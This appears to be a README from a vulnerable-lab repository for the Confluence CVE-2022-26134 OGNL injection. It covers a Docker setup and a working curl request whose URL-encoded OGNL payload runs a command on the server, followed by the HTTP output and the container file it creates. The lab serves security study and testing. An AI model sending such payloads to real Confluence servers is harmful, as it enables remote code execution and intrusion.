Skip to content

Latest commit

 

History

History

confluence-cve-2022-26134

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Confluence CVE-2022-26134 OGNL vulnerability

This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution.

In order for this vulnerability to be exploitable, the following conditions must be met:

  • Use versions of Confluence lower than 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1
  • Confluence is configured (can't use a server that hasn't been installed and not connected to a DB)

Running the application

Run it:

docker-compose up

Install confluence

  1. Navigate to localhost:8090
  2. Get a trial license (this won't work without one)
  3. It'll take a while to configure, make sure you have 3-4gb of RAM
  4. Use a test site/template, and use confluence to manage users. Fill in default for admin
  5. Once you get past the admin creation step, you can run the exploit

Exploitation steps

curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/

Output:

└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
*   Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1
> Host: localhost:8090
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< Cache-Control: no-store
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Confluence-Request-Time: 1654294225669
< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Fri, 03 Jun 2022 22:10:25 GMT
<
* Connection #0 to host localhost left intact
* Closing connection 0

Exec into the container

└> docker exec -it vulnerable-confluence bash

root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp
total 12K
drwxrwxrwt 1 root       root       4.0K Jun  3 22:12 .
drwxr-xr-x 1 root       root       4.0K Jun  3 19:56 ..
drwxr-xr-x 2 confluence confluence 4.0K Jun  3 22:07 hsperfdata_confluence
-rw-r----- 1 confluence confluence    0 Jun  3 22:10 pwned